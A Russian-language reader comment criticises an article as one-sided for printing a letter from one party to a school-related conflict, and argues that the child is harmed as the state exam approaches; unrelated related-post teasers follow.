    Письмо в статье написано одной из конфликтующих сторон. В конфликте всегда виноваты обе стороны. А в письме, конечно, - ни слова о собственных художествах. Считаю непрофессиональными и однобокими подобные публикации. И вред наносится здесь, в первую очередь, ребёнку, так как конфликт лишь раздувается подобным образом, а ГИА - не за горами.



    Публикации по теме

    • Как удлинить школьное платье Как удлинить школьное платье

      Ребята, мы вкладываем душу в сайт. Cпасибо за то,что открываете эту красоту. Спасибо за вдохновение и мурашки.Присоединяйтесь к нам в...

    • Что означает татуировка сокола? Что означает татуировка сокола?

      Решили сделать себе татуировки? Ну что ж, это по современному и в духе времени! Но прежде, чем остановить свой выбор на том или ином...